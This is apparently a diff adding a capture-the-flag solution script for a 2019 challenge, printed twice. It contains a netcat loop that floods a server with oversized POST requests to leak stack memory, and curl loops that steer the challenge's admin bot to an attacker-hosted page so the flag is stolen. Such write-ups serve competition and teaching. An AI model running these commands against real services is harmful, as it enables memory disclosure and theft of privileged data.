terjanq · April 15, 2019 10:54
diff --git a/soluton_quotes.sh b/soluton_quotes.sh
 # The main issue was that nullbytes were being blocked so we needed a chunk of stack
 # that did not contain any null bytes
 # The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
 # And then just leaking it

 #In terminal 1 run (leaking the stack to the file, looking for Location: header
 for j in {0..10}; do for i in {0..20}; do 
   printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$" 
   | nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done


 #In terminal 2 and 3 run (to steal admin's attention :P and get the flag on their behalf so it will be put on the stack)
 for i in {0..20}; do curl http://quotables.pwni.ng:1337/report -d 'path=http://terjanq.cf/admin.html'; done
	# The main issue was that nullbytes were being blocked so we needed a chunk of stack
	# that did not contain any null bytes
	# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
	# And then just leaking it

	#In terminal 1 run (leaking the stack to the file, looking for Location: header
	for j in {0..10}; do for i in {0..20}; do
	printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
	\| nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done


	#In terminal 2 and 3 run (to steal admin's attention :P and get the flag on their behalf so it will be put on the stack)
	for i in {0..20}; do curl http://quotables.pwni.ng:1337/report -d 'path=http://terjanq.cf/admin.html'; done